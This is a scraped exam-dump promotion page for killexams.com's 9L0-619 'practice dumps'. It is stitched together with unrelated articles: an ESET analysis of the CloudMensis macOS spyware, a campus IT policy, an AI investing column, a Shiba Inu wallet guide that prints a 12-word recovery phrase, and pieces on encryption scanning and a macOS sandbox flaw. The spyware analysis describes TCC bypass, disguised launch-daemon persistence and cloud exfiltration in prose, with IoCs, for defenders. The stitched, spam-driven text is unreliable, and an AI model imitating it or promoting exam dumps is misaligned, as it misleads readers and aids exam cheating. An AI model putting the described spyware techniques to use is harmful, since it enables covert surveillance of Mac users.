Trust these 9L0-619 Practice Questions and go for actual test.

when you are searching on web for 9L0-619 eBooks so there are huge number of 9L0-619 eBooks on internet free of cost, but those are all outdated and you will risk your precious time and money. Go directly to killexams.com, download 100% free 9L0-619 questions PDF sample. Evaluate and register for full version. Practice 9L0-619 dumps and pass the exam.

Exam Code: 9L0-619 Practice exam 2022 by Killexams.com team
Mac OS X Deployment v10.5
Apple Deployment information search
Killexams : Apple Deployment information search - BingNews https://killexams.com/pass4sure/exam-detail/9L0-619 Search results Killexams : Apple Deployment information search - BingNews https://killexams.com/pass4sure/exam-detail/9L0-619 https://killexams.com/exam_list/Apple Killexams : I see what you did there: A look at the CloudMensis macOS spyware

Previously unknown macOS malware uses cloud storage as its C&C channel and to exfiltrate documents, keystrokes, and screen captures from compromised Macs

In April 2022, ESET researchers discovered a previously unknown macOS backdoor that spies on users of the compromised Mac and exclusively uses public cloud storage services to communicate back and forth with its operators. Following analysis, we named it CloudMensis. Its capabilities clearly show that the intent of its operators is to gather information from the victims’ Macs by exfiltrating documents, keystrokes, and screen captures.

Apple has recently acknowledged the presence of spyware targeting users of its products and is previewing Lockdown Mode on iOS, iPadOS and macOS, which disables features frequently exploited to gain code execution and deploy malware. Although not the most advanced malware, CloudMensis may be one of the reasons some users would want to enable this additional defense. Disabling entry points, at the expense of a less fluid user experience, sounds like a reasonable way to reduce the attack surface.

This blogpost describes the different components of CloudMensis and their inner workings.

CloudMensis overview

CloudMensis is malware for macOS developed in Objective-C. Samples we analyzed are compiled for both Intel and Apple silicon architectures. We still do not know how victims are initially compromised by this threat. However, we understand that when code execution and administrative privileges are gained, what follows is a two-stage process (see Figure 1), where the first stage downloads and executes the more featureful second stage. Interestingly, this first-stage malware retrieves its next stage from a cloud storage provider. It doesn’t use a publicly accessible link; it includes an access token to obtain the MyExecute file from the drive. In the demo we analyzed, pCloud was used to store and deliver the second stage.

Figure 1. Outline of how CloudMensis uses cloud storage services

Artifacts left in both components suggest they are called execute and Client by their authors, the former being the downloader and the latter the spy agent. Those names are found both in the objects’ absolute paths and ad hoc signatures.

Figure 2. Partial strings and code signature from the downloader component, execute

Figure 3. Partial strings and code signature from the spy agent component, Client

Figures 2 and 3 also show what appear to be internal names of the components of this malware: the project seems to be called BaD and interestingly resides in a subdirectory named LeonWork. Further, v29 suggests this demo is version 29, or perhaps 2.9. This version number is also found in the configuration filename.

The downloader component

The first-stage malware downloads and installs the second-stage malware as a system-wide daemon. As seen in Figure 4, two files are written to disk:

  1. /Library/WebServer/share/httpd/manual/WindowServer: the second-stage Mach-O executable, obtained from the pCloud drive
  2. /Library/LaunchDaemons/.com.apple.WindowServer.plist: a property list file to make the malware persist as a system-wide daemon

At this stage, the attackers must already have administrative privileges because both directories can only be modified by the root user.

Figure 4. CloudMensis downloader installing the second stage

Cleaning up after usage of a Safari exploit

The first-stage component includes an interesting method called removeRegistration that seems to be present to clean up after a successful Safari sandbox escape exploit. A first glance at this method is a bit puzzling considering that the things it does seem unrelated: it deletes a file called root from the EFI system partition (Figure 5), sends an XPC message to speechsynthesisd (Figure 6), and deletes files from the Safari cache directory. We initially thought the purpose of removeRegistration was to uninstall previous versions of CloudMensis, but further research showed that these files are used to launch sandbox and privilege escalation exploits from Safari while abusing four vulnerabilities. These vulnerabilities were discovered and well documented by Niklas Baumstark and Samuel Groß in 2017. All four were patched by Apple the same year, so this distribution technique is probably not used to install CloudMensis anymore. This could explain why this code is no longer called. It also suggests that CloudMensis may have been around for many years.

Figure 5. Decompiled code showing CloudMensis mounting the EFI partition

Figure 6. Sending an XPC message to speechsynthesisd

The spy agent component

The second stage of CloudMensis is a much larger component, packed with a number of features to collect information from the compromised Mac. The intention of the attackers here is clearly to exfiltrate documents, screenshots, email attachments, and other sensitive data.

CloudMensis uses cloud storage both for receiving commands from its operators and for exfiltrating files. It supports three different providers: pCloud, Yandex Disk, and Dropbox. The configuration included in the analyzed demo contains authentication tokens for pCloud and Yandex Disk.

Configuration

One of the first things the CloudMensis spy agent does is load its configuration. This is a binary structure that is 14,972 bytes long. It is stored on disk at ~/Library/Preferences/com.apple.iTunesInfo29.plist, encrypted using a simple XOR with a generated key (see the Custom encryption section).

If this file does not already exist, the configuration is populated with default values hardcoded in the malware sample. Additionally, it also tries to import values from what seem to be previous versions of the CloudMensis configuration at:

  • ~/Library/Preferences/com.apple.iTunesInfo28.plist
  • ~/Library/Preferences/com.apple.iTunesInfo.plist

The configuration contains the following:

  • Which cloud storage providers to use and authentication tokens
  • A randomly generated bot identifier
  • Information about the Mac
  • Paths to various directories used by CloudMensis
  • File extensions that are of interest to the operators

The default list of file extensions found in the analyzed sample, pictured in Figure 7, shows that operators are interested in documents, spreadsheets, audio recordings, pictures, and email messages from the victims’ Macs. The most uncommon format is perhaps audio recordings using the Adaptive Multi-Rate codec (using the .amr and .3ga extensions), which is specifically designed for speech compression. Other interesting file extensions in this list are .hwp and .hwpx files, which are documents for Hangul Office (now Hancom Office), a popular word processor among Korean speakers.

Figure 7. File extensions found in the default configuration of CloudMensis

Custom encryption

CloudMensis implements its own encryption function that its authors call FlowEncrypt. Figure 8 shows the disassembled function. It takes a single byte as a seed and generates the rest of the key by performing a series of operations on the most recently generated byte.  The input is XORed with this keystream. Ultimately the current byte’s value will be the same as one of its previous values, so the keystream will loop. This means that even though the cipher seems complex, it can be simplified to an XOR with a static key (except for the first few bytes of the keystream, before it starts looping).

Figure 8. Disassembled FlowEncrypt method

Bypassing TCC

Since the release of macOS Mojave (10.14) in 2018, access to some sensitive inputs, such as screen captures, cameras, microphones and keyboard events, are protected by a system called TCC, which stands for Transparency, Consent, and Control. When an application tries to access certain functions, macOS prompts the user whether the request from the application is legitimate, who can grant or refuse access. Ultimately, TCC rules are saved into a database on the Mac. This database is protected by System Integrity Protection (SIP) to ensure that only the TCC daemon can make any changes.

CloudMensis uses two techniques to bypass TCC (thus avoiding prompting the user), thereby gaining access to the screen, being able to scan removable storage for documents of interest, and being able to log keyboard events. If SIP is disabled, the TCC database (TCC.db) is no longer protected against tampering. Thus, in this case CloudMensis add entries to grant itself permissions before using sensitive inputs. If SIP is enabled but the Mac is running any version of macOS Catalina earlier than 10.15.6, CloudMensis will exploit a vulnerability to make the TCC daemon (tccd) load a database CloudMensis can write to. This vulnerability is known as CVE-2020–9934 and was reported and described by Matt Shockley in 2020.

The exploit first creates a new database under ~/Library/Application Support/com.apple.spotlight/Library/Application Support/com.apple.TCC/ unless it was already created, as shown in Figure 9.

Figure 9. Checking it the illegitimate TCC database file already exists

Then, it sets the HOME environment variable to ~/Library/Application Support/com.apple.spotlight using launchctl setenv, so that the TCC daemon loads the alternate database instead of the legitimate one. Figure 10 shows how it is done using NSTask.

Figure 10. Mangling the HOME environment variable used by launchd with launchctl and restarting tccd

Communication with the C&C server

To communicate back and forth with its operators, the CloudMensis configuration contains authentication tokens to multiple cloud service providers. Each entry in the configuration is used for a different purpose. All of them can use any provider supported by CloudMensis. In the analyzed sample, Dropbox, pCloud, and Yandex Disk are supported.

The first store, called CloudCmd by the malware authors according to the global variable name, is used to hold commands transmitted to bots and their results. Another, which they call CloudData, is used to exfiltrate information from the compromised Mac. A third one, which they call CloudShell, is used for storing shell command output. However, this last one uses the same settings as CloudCmd.

Before it tries fetching remote files, CloudMensis first uploads an RSA-encrypted report about the compromised Mac to /January/ on CloudCmd. This report includes shared secrets such as a bot identifier and a password to decrypt to-be-exfiltrated data.

Then, to receive commands, CloudMensis fetches files under the following directory in the CloudCmd storage: /Febrary/<bot_id>/May/. Each file is downloaded, decrypted, and dispatched to the AnalizeCMDFileName method. Notice how both February and Analyze are spelled incorrectly by the malware authors.

The CloudData storage is used to upload larger files requested by the operators. Before the upload, most files are added to a password-protected ZIP archive. Generated when CloudMensis is first launched, the password is kept in the configuration, and transferred to the operators in the initial report.

Commands

There are 39 commands implemented in the analyzed CloudMensis sample. They are identified by a number between 49 and 93 inclusive, excluding 57, 78, 87, and 90 to 92. Some commands require additional arguments. Commands allow the operators to perform actions such as:

  • Change values in the CloudMensis configuration: cloud storage providers and authentication tokens, file extensions deemed interesting, polling frequency of cloud storage, etc.
  • List running processes
  • Start a screen capture
  • List email messages and attachments
  • List files from removable storage
  • Run shell commands and upload output to cloud storage
  • Download and execute arbitrary files

Figure 11 shows command with identifier 84, which lists all jobs loaded by launchd and uploads the results now or later, depending on the value of its argument.

Figure 11. Command 84 runs launchctl list to get launchd jobs

Figure 12 shows a more complex example. Command with identifier 60 is used to launch a screen capture. If the first argument is 1, the second argument is a URL to a file that will be downloaded, stored, and executed by startScreenCapture. This external executable file will be saved as windowserver in the Library folder of FaceTime’s sandbox container. If the first argument is zero, it will launch the existing file previously dropped. We could not find samples of this screen capture agent.

Figure 12. Command 60: Start a screen capture

It’s interesting to note that property list files to make launchd start new processes, such as com.apple.windowServer.plist, are not persistent: they are deleted from disk after they are loaded by launchd.

Metadata from cloud storage

Metadata from the cloud storages used by CloudMensis reveals interesting details about the operation. Figure 13 shows the tree view of the storage used by CloudMensis to send the initial report and to transmit commands to the bots as of April 22nd, 2022.

Figure 13. Tree view of the directory listing from the CloudCmd storage

This metadata gave partial insight into the operation and helped draw a timeline. First, the pCloud accounts were created on January 19th, 2022. The directory listing from April 22nd  shows that 51 unique bot identifiers created subdirectories in the cloud storage to receive commands. Because these directories are created when the malware is first launched, we can use their creation date to determine the date of the initial compromise, as seen in Figure 14.

Figure 14. Subdirectory creation dates under /Febrary (sic)

This chart shows a spike of compromises in early March 2022, with the first being on February 4th. The last spike may be explained by sandboxes running CloudMensis, once it was uploaded to VirusTotal.

Conclusion

CloudMensis is a threat to Mac users, but its very limited distribution suggests that it is used as part of a targeted operation. From what we have seen, operators of this malware family deploy CloudMensis to specific targets that are of interest to them. Usage of vulnerabilities to work around macOS mitigations shows that the malware operators are actively trying to maximize the success of their spying operations. At the same time, no undisclosed vulnerabilities (zero-days) were found to be used by this group during our research. Thus, running an up-to-date Mac is recommended to avoid, at least, the mitigation bypasses.

We still do not know how CloudMensis is initially distributed and who the targets are. The general quality of the code and lack of obfuscation shows the authors may not be very familiar with Mac development and are not so advanced. Nonetheless a lot of resources were put into making CloudMensis a powerful spying tool and a menace to potential targets.

IoCs

Files

SHA-1 Filename Description ESET detection name
D7BF702F56CA53140F4F03B590E9AFCBC83809DB mdworker3 Downloader (execute) OSX/CloudMensis.A
0AA94D8DF1840D734F25426926E529588502BC08 WindowServer, myexe Spy agent (Client) OSX/CloudMensis.A
C3E48C2A2D43C752121E55B909FC705FE4FDAEF6 WindowServer, MyExecute Spy agent (Client) OSX/CloudMensis.A

Public key

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsGRYSEVvwmfBFNBjOz+Q
pax5rzWf/LT/yFUQA1zrA1njjyIHrzphgc9tgGHs/7tsWp8e5dLkAYsVGhWAPsjy
1gx0drbdMjlTbBYTyEg5Pgy/5MsENDdnsCRWr23ZaOELvHHVV8CMC8Fu4Wbaz80L
Ghg8isVPEHC8H/yGtjHPYFVe6lwVr/MXoKcpx13S1K8nmDQNAhMpT1aLaG/6Qijh
W4P/RFQq+Fdia3fFehPg5DtYD90rS3sdFKmj9N6MO0/WAVdZzGuEXD53LHz9eZwR
9Y8786nVDrlma5YCKpqUZ5c46wW3gYWi3sY+VS3b2FdAKCJhTfCy82AUGqPSVfLa
mQIDAQAB
-----END PUBLIC KEY-----

Paths used

  • /Library/WebServer/share/httpd/manual/WindowServer
  • /Library/LaunchDaemons/.com.apple.WindowServer.plist
  • ~/Library/Containers/com.apple.FaceTime/Data/Library/windowserver
  • ~/Library/Containers/com.apple.Notes/Data/Library/.CFUserTextDecoding
  • ~/Library/Containers/com.apple.languageassetd/loginwindow
  • ~/Library/Application Support/com.apple.spotlight/Resources_V3/.CrashRep

MITRE ATT&CK techniques

This table was built using version 11 of the MITRE ATT&CK framework.

Tactic ID Name Description
Persistence T1543.004 Create or Modify System Process: Launch Daemon The CloudMensis downloader installs the second stage as a system-wide daemon.
Defense Evasion T1553 Subvert Trust Controls CloudMensis tries to bypass TCC if possible.
Collection T1560.002 Archive Collected Data: Archive via Library Archive Collected Data: Archive via Library CloudMensis uses SSZipArchive to create a password-protected ZIP archive of data to exfiltrate.
T1056.001 Input Capture: Keylogging CloudMensis can capture and exfiltrate keystrokes.
T1113 Screen Capture CloudMensis can take screen captures and exfiltrate them.
T1005 Data from Local System CloudMensis looks for files with specific extensions.
T1025 Data from Removable Media CloudMensis can search removable media for interesting files upon their connection.
T1114.001 Email Collection: Local Email Collection CloudMensis searches for interesting email messages and attachments from Mail.
Command and Control T1573.002 Encrypted Channel: Asymmetric Cryptography The CloudMensis initial report is encrypted with a public RSA-2048 key.
T1573.001 Encrypted Channel: Symmetric Cryptography CloudMensis encrypts exfiltrated files using password-protected ZIP archives.
T1102.002 Web Service: Bidirectional Communication CloudMensis uses Dropbox, pCloud, or Yandex Drive for C&C communication.
Exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage CloudMensis exfiltrates files to Dropbox, pCloud, or Yandex Drive.
Tue, 19 Jul 2022 15:22:00 -0500 en-US text/html https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/
Killexams : ITS Deployment Guide

Full-time faculty and staff are currently on a five-year computer lifecycle.  When your computer reaches this age, you will receive an email to provide information on your specifications for a new computer.

The current replacement year is: FY14.

If your computer is FY14 or older and you are a full-time faculty or staff member and have not received a communication, please contact the Help Desk.

Older machines that are assigned to adjunct, part-time, or work-study positions are not replaced with new machines.  If you believe one of these machines should be replaced because of performance issues or specific work requirements, please contact the Help Desk with your request and justification.  We will review your request and may assign a second-life machine as a replacement.  (Second-life machines will generally be newer than the model you currently have, but not a brand new machine.)

Changes to Deployment Policy

Starting in 2013, full-time faculty and staff have their choice of either an Apple or Dell laptop or desktop subject to the following guidelines:

1. The University is no longer providing dual-boot computers with both the Windows and Mac OS X operating systems. If you choose an Apple computer, you will only have the Mac operating system installed. If you need Windows, you must choose a Dell computer.
 
2. If you choose a laptop, you will only be provided with a mouse upon request. All additional peripherals (external keyboard, monitor, scanner, etc.) must be paid for with departmental funds.
 
3. All old computers must be returned to IT when the new computer is deployed. There is no option to keep your old computer in addition to your new computer or to opt out of the new deployment. The lifecycle is in place to remove old computers that continue to put a heavy strain on support resources and create security risks on campus.
 
4. Any hardware enhancements and non-standard software must also be purchased with departmental funds.
Thu, 30 Jul 2020 23:38:00 -0500 en text/html https://www.wilkes.edu/about-wilkes/offices-and-administration/information-technology-services/deployment-guide.aspx
Killexams : Artificial Intelligence may be the future but treat it with care

Many people believe that you should only invest in what you know. But it is wise occasionally to break this rule, to step outside your comfort zone into the new worlds like the crazy kingdom of TikTok, the Chinese video app.

You may not be enamoured of its cat videos, although you may have appreciated this week's advice on how to stay cool in a heatwave, such as placing a bowl of ice cubes in front of a fan. 

But, for the sake of your portfolio, it's worth being interested in how this app, dubbed 'supremely addictive' by The Economist, has attracted 1billion users worldwide. 

This is thanks to the deft, relentless deployment of machine learning and natural language processing (NLP), which are subsets of artificial intelligence. 

Artificial Intelligence (AI) powers voice assistants like Amazon's Alexa and Apple's Siri, and the Google search engine. Its other uses – they are multiplying all the time – include crime prevention, farming, financial advice, fraud detection, weather forecasting and self-driving cars. 

AI is forecast to play a huge role in healthcare, as spending constraints force the more effective allocation of budgets. Last year Microsoft paid $19billion for voice recognition firm Nuance Communications whose NLP systems enable the transcription of speech during visits to the doctor. 

The Sanlam Artificial Intelligence fund holds Alphabet, Microsoft and about 30 other stocks, chosen from 20,000 candidates in a process that relies on AI early on. Fund manager Chris Ford says the long-term impact is likely to be 'similar to that of the railways, telephone or television'. 

He continues: 'AI is a disinflationary force because it allows scarce resources to be deployed very efficiently: AI systems can work 24/7. Surging inflation and the cost of labour in the West will increase AI adoption, as companies try to contain prices.' 

You may be filled with apprehension about the long-term implications of AI. 

A new book, Machines Behaving Badly: The Morality of AI, by computer scientist Toby Walsh will be one of my summer reads. But I will still be looking for long-term opportunities in AI, as the exact stock market rout has slashed the share prices of companies in the sector. 

Shares in Deere, the agricultural equipment group, which offers an autonomous tractor, are down 19 per cent this year. 

Shares in Nvidia, the AI hardware and software group, are down by 48pc to $152 but US bank Citigroup rates the shares a buy. Given the complexity of assessing the credentials of this and other AI businesses, I will be depending on the judgment calls made by managers of specialist funds. 

Taking the plunge? Allocating investments to AI is a leap of faith

Some, like iShares Automation & Robotics and L&G ROBO Global Robotics and Automation, invest in the allied field of robotics, where machines work on commands or on their own memory. 

Some, like Sanlam's sister fund, Asia Pacific Artificial Intelligence, focus on that region where belief in AI's potential and an abundance of STEM (science, technology, engineering and mathematics) graduates are powering explosive growth.

Other funds own companies that supply the essential kit for this expansion. The largest holding at Temit (Templeton Emerging Market Investment Trust) is Taiwan Semiconductor Manufacturing Company (TSMC), maker of the best AI microchips. 

These can carry out parallel computations rather than just sequential ones. Andrew Ness, Temit's co-manager says it is thanks to such chips that 'smart devices today can capture, process, and react to information independently'. Shares in Temit are at a 14 per cent discount to the net value of its assets.

If you are venturing into AI funds, check whether you already have money in some of their popular holdings, such as Ocado, the online supermarket. Ocado uses AI 'to make possible in seconds, what thousands of humans working together can't'. Despite this, its shares have halved this year, highlighting that if you want to back AI, you need patience and the ability to suffer losses. 

Sanlam has a stake in Tesla whose shares have also tumbled. 

Anyone – like me – with money in the Scottish Mortgage Investment Trust, another Tesla backer, must hope that Elon Musk can deliver on his big promises for autonomous vehicles. 

Shares in Scottish Mortgage are recovering from a slump primarily caused by concerns over the valuation of its large unlisted segment. This encompasses ByteDance, TikTok's parent, which was hit by the Chinese state's crackdown on tech companies. 

Allocating investments to AI is a leap of faith. But this tech revolution will not be reversed, no matter how disturbing some may find its possible consequences. 

Some links in this article may be affiliate links. If you click on them we may earn a small commission. That helps us fund This Is Money, and keep it free to use. We do not write articles to promote products. We do not allow any commercial relationship to affect our editorial independence.

Fri, 15 Jul 2022 08:52:00 -0500 text/html https://www.thisismoney.co.uk/money/investing/article-11018463/Artificial-Intelligence-future-treat-care.html
Killexams : How To Buy Shiba Inu Coin In A Trust Wallet

An emerging cryptocurrency called Shiba Inu (SHIB) offers an Ethereum-based substitute for Dogecoin (DOGE), another popular and fashionable meme coin. Using the Trust Wallet, a Crypto & Bitcoin Wallet, or UniSwap, you may easily purchase Shiba Inu Coin from any location on the globe. Another flourishing cryptocurrency that is now very well-liked is called the Shiba Inu token, however novice virtual currency users might be unsure about where to get the DOGE-based cryptocurrency. Without further waiting, let’s dive into it!

Shiba Inu is a cryptocurrency that Ethereum’s blockchain supports. It was meant to take the place of the well-known Dogecoin when it was surreptitiously published in August 2020 by a person or group going by the moniker Ryoshi.

Shiba Inu, a Japanese breed dog, serves as the mascot for both Shiba Inu and Dogecoin and is widely referred to as “the Dogecoin killer.” The cryptocurrency serves more as a tradable token than anything else in terms of usefulness. ShibaSwap is the name of the ecosystem that underpins its cryptocurrency exchange.

Shiba may be purchased on centralised and decentralised exchanges, respectively. You can move on to the next stage if you often utilise a centralised exchange, like eToro.

For particular cryptocurrencies, like Shiba, decentralised exchanges (DEX) are the way to go because they are compatible with almost all forms of Ethereum-based assets. Uniswap is the best supplier in this situation. In its protocols, Uniswap has more than $2 billion locked up, and the source is presently being used by a large number of investors to manage their Ethereum-based tokens.

A particular software wallet, such as MetaMask or Coinbase Wallet, is required while utilising DEX. In contrast to other centralised exchanges, these crypto wallets are free to use and let you keep control of your money.

First of all, you should look into the price prediction of SHIBA INU. If it seems to be rising, then you can buy it. To see the price forecasts of SHIBA INU, click here. Shiba, as you may know, functions on the Ethereum blockchain, therefore one method is to purchase ETH and exchange it for SHIB. To access Uniswap for this lesson, you need to have both a Coinbase account and the TrustWallet app (a decentralised cryptocurrency exchange).

Installing the trust wallet app on your Android or Apple phone is the first step. Then register for an account on the suggested app. Pancakeswap, a feature of the programme, allows you to convert Bitcoin or USDT to Shiba Inu currency.

This is how you use a Trust Wallet to buy and sell Shiba Inu coins.

Binance established and oversees the successful official cryptographic wallet known as Trust Wallet. For cryptocurrency users, Trust Wallet is a useful programme. This implies that the Trust Wallet software is the best option for users who want to securely transfer, receive, and store Bitcoin, Ethereum, or any other cryptocurrency.

The wallet plays a key role in raising awareness of your encryption. It enables you to use the most exact DApps and Defi platforms while playing blockchain games. Trust Wallet is a quick, secure multi-cryptographic wallet with compatibility for the Binance DEX that was designed with portability and asset concealment in mind. Trust Wallet offers consumers a top-notch experience and is intended to be the ideal secured wallet app:

  • Trust wallet is a non-custodial wallet, which enables you to control your wallet’s private keys. Although Trust Wallet primarily supports Ethereum, it also provides a wide array of other digital currencies and blockchains. Trust wallet supports a variety of different chains and decentralised apps on those blockchains, including Ethereum, Polygon,  Binance Smart Chain, Avalanche,  and many others.
  • Another cryptocurrency wallet that supports several blockchains is the Trust wallet. Therefore, the Trust wallet software may be used to store several cryptocurrencies. Let’s use the Trust wallet to establish a bitcoin wallet now. The steps are listed below.
  • If you have never created a wallet before, do it now. To create a new wallet, simply click the button and agree to the terms of service.
  • Set your wallet up with a passcode.
  • 12 words will now be displayed to you; you must write them down and save them securely. Keep them safe and don’t provide them to anyone, or you’ll lose all of your money. Congress dove bench picnic quick piece conscious client muscle police surface exist
  • Verify your secret phrase once again, then click “Done.” You’ve created a bitcoin wallet successfully.
  • Choose the button in the top-right corner, then add any coin or token you choose from the list that appears.
  • Add it by searching for “SHIB.” Shiba Inu ERC20 will be displayed.
  • The SHIBA INU ticker will now be shown in your wallet.

Let’s explore how to purchase Shiba Inu coins straight from the Trust wallet app now that the Trust wallet has been configured.

  • There is a DApp browser in the Trust wallet. In order to purchase Shiba Inu coins or any other currency, we may communicate with decentralised exchanges like Uniswap or Sushiswap. Simply follow the instructions below. To begin with, you must have Ethereum (ETH) in your wallet in order to purchase a Shiba Inu coin and cover transaction costs. A buddy, another wallet, or an exchange like Coinbase, Binance, or Kucoin are all places where you can get Ethereum (ETH).
  • Having ETH in your wallet now, let’s proceed to purchase Shiba Inu currency.
  • Enter the Uniswap exchange URL, which is https://app.uniswap.org/, under the ‘DApps’ tab of your Trust wallet, or choose the Uniswap Exchange under the DeFi category.
  • After you register your wallet, a Swap dashboard will appear. There, you will also be able to view your ETH balance.
  • Choose ETH on the top bar and SHIB on the bottom bar as we switch from ETH to SHIB. Search for or enter SHIB, then select “Import” to do that. Alternatively, you may just copy and paste this SHIB contract address before selecting “Import.”
  • Type in how much ETH you want to convert to SHIB or how much SHIB you want to purchase. Due to the necessity for some ETH to cover transaction costs, you are unable to input the maximum amount of ETH.
  • Click “Swap,” double-check the information, and then click “Confirm swap.”
  • As you complete the exchange, you will now receive a prompt that is a Smart Contract Call. You won’t be able to complete the transaction if the “Max Entire” is higher than the total value in your wallet. An insufficient Ethereum (ETH) balance is displayed.
  • Be sure that the “Max Total” is less than the amount of ETH that is currently in your wallet. 9. The amount you wish to trade plus the network cost, which is the Ethereum gas fee, equals the maximum total. To purchase Shiba Inu on the Trust wallet, you must pay some Ethereum gas costs. The quantity of transactions taking place at any given time on the Ethereum network determines this network cost.
  • If everything looks good, click “Confirm.” Your transaction will be performed shortly, and the ‘Wallet’ tab will change to reflect your revised Shiba Inu currency balance.
  • The Shiba Inu coin was successfully purchased with the Trust wallet app. You may exchange your SHIB back into ETH in the same manner, and you can use ETH on Uniswap to purchase any other coin.

The Shiba Inu token is already available on the majority of websites, although most people may not know where to get it from. This article should make it easier to choose among the several cryptocurrency exchanges accessible to buy SHIB. To prevent losses, you must first review the SHIBA INU price forecast before investing.

Sun, 31 Jul 2022 23:37:00 -0500 Ali Bajwa en-US text/html https://techbullion.com/how-to-buy-shiba-inu-coin-in-a-trust-wallet/
Killexams : These iPhone Tips are Genius - You'll Never Mum Without Them Again No result found, try new keyword!Thankfully though, Instagram saved me from 7pm bedtimes with a genius iPhone hack. And, because we all deserve to know what we can do to make our lives easier I’m here sharing THE hack, plus more, ... Wed, 27 Jul 2022 23:12:59 -0500 en-gb text/html https://www.msn.com/en-gb/money/technology/woah-these-iphone-tips-are-genius-for-forgetful-sleep-deprived-parents/ar-AA101STN?fromMaestro=true Killexams : British intelligence recycles old argument for thwarting strong encryption: Think of the children!

Comment Two notorious characters from the British security services have published a paper that once again suggests breaking strong end-to-end encryption would be a good thing for society. 

Nearly four years ago Ian Levy, technical director of the UK National Cyber Security Centre, along with technical director for cryptanalysis at the British spy agency GCHQ Crispin Robinson, published a paper arguing for "virtual crocodile clips" on encrypted communications that could be used to keep us all safe from harm. On Thursday they gave it another shot, with a new paper pushing a very similar argument, while acknowledging its failings.

"This paper is not a rigorous security analysis, but seeks to show that there exist today ways of countering much of the online child sexual abuse harms, but also to show the scope and scale of the work that remains to be done in this area," they write.

"We have not identified any techniques that are likely to provide as accurate detection of child sexual abuse material as scanning of content, and whilst the privacy considerations that this type of technology raises must not be disregarded, we have presented arguments that suggest that it should be possible to deploy in configurations that mitigate many of the more serious privacy concerns." 

The somewhat dynamic duo argues that to protect against child sexual abuse and the material it produces, it's in everyone's interests if law enforcement has some kind of access to private communications. The same argument has been used many times before, usually against one of the Four Horsemen of the Infocalypse: terrorists, drug dealers, child sexual abuse material (CSAM), and organized crime.

Their proposal is to restart attempts at automated filtering, specifically with service providers – who are ostensibly offering encrypted communications – being asked to insert themselves in the process to check that CSAM isn't being sent around online. This could be performed by AI trained to detect such material. Law enforcement could then be tipped off and work with these companies to crack down on the CSAM scourge.

Apple infamously tried to make the same argument to its users last year before backing down on client-side monitoring. It turns out promising privacy and then admitting you're going to be scanning users' chatter and data isn't a popular selling point.

Apple can't solve it, neither can we

In their latest paper Levy and Robinson argue that this isn't a major issue, since non-governmental organizations could be used to moderate the automatic scanning of personal information for banned material. This would avoid the potential abuse of such a scheme, they argue, and only the guilty would have something to fear.

It's not a new argument, and has been used again and again in the conflict between encryption advocates who like private conversations and governments that don't. Technology experts mostly agree such a system can't be insulated from abuse: the scanning could be backdoored, it could report innocent yet private content as false positives, or it could be gradually expanded to block stuff politicians wish to suppress. Governments would prefer to think otherwise, but the paper does at least acknowledge that people seeking privacy aren't suspects.

"We acknowledge that for some users in some circumstances, anonymity is, in and of itself, a safety feature," Levy and Robinson opine. "We do not seek to suggest that anonymity on commodity services is inherently bad, but it has an effect on the child sexual abuse problem." 

Which is a soft way of saying conversations can be used to plan crimes so they should be monitored. No one's denying the incredible harm that stems from the scum who make CSAM, but allowing monitoring of all private communications – albeit by a third party – seems a very high price to pay.

Apple backed down on its plans to automatically scan users' data for such material in part because it has built its marketing model around selling privacy as a service to customers – although this offer does not apply in China. Therein lies the point: if Apple is willing to let Middle Kingdom mandarins interfere, there's no certain that it won't do the same for other nations if it's in the corporate interest.

Cupertino's technology would search for images using the NeuralHash machine-learning model to identify CSAM, a model the Brit duo say "should be reasonably simple to engineer." The problem is that the same tech could also be used to identify, filter out, and report other images – such as pictures mocking political leaders or expressing a viewpoint someone wanted to monitor.

Levy and Robinson think this is a fixable problem. More research is needed. Also, human moderators should be able to intervene to catch false positives before suspected images are passed to law enforcement to investigate.

Not my problem

Interestingly, the two make the point repeatedly that this is going to be the service providers' responsibility to manage. While insisting the paper is not official government doctrine, it's clear Her Majesty's Government has no intention of picking up the tab for this project, nor overseeing its operation.

"These safety systems will be implemented by the service owner in their app, SDK or browser-based access," they say. "In that case, the software is of the same standard as the provider's app code, managed by the same teams with the same security input." 

And allowing private companies to filter user data with government approval has always worked so well in the past. This is an old, old argument – as old as encryption itself.

We saw it first crop up in the 1970s when Whitfield Diffie and Martin Hellman published on public-key encryption (something GCHQ had apparently developed independently years before.) Such systems were labelled munitions, and their use and export severely limited – PGP creator Phil Zimmerman suffered three years of investigations in the 1990s over trying to enable private digital conversations.

As recently as 2019, someone at the US Department of Justice slipped the leash and suggested they didn't want a backdoor, but a front one – again using the CSAM argument. Some things never change. ®

Fri, 22 Jul 2022 08:34:00 -0500 en text/html https://www.theregister.com/2022/07/22/british_encryption_scanning/
Killexams : MacOS Bug Could Let Malicious Code Break Out of Application Sandbox

Microsoft has revealed a now-fixed flaw in Apple's macOS that allowed specific kinds of code to bypass the operating system's App Sandbox restrictions on third-party applications, potentially allowing attackers to escalate device privileges and install additional malicious payloads.

Microsoft shares credit for the find (CVE-2022-26706) with researcher Arsenii Kostromin, the company said in its announcement, adding that Apple patched the vulnerability in its May 16 security update.

The team at Microsoft discovered the bug while researching malicious macros in Microsoft Office for macOS, they explained in a recent blog post.

"Our research shows that even the built-in, baseline security features in macOS could still be bypassed, potentially compromising system and user data," the team wrote. "Therefore, collaboration between vulnerability researchers, software vendors, and the larger security community remains crucial to helping secure the overall user experience. This includes responsibly disclosing vulnerabilities to vendors."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Wed, 13 Jul 2022 09:54:00 -0500 en text/html https://www.darkreading.com/application-security/macos-bug-let-malicious-code-break-out-of-app-sandbox
Killexams : Apple @ Work: macOS Ventura and iOS 16 drive Apple’s vision for identity in the enterprise

Apple @ Work is brought to you by Mosyle, the only Apple Unified Platform. Mosyle is the only solution that fully integrates 5 different applications on a single Apple-only platform, allowing Businesses and Schools to easily and automatically deploy, manage & protect all their Apple devices . Over 32,000 organizations leverage Mosyle solutions to automate the deployment,  management and security of millions of Apple devices daily. Request a FREE account today and discover how you can put your Apple fleet on auto-pilot at a price point that is hard to believe.

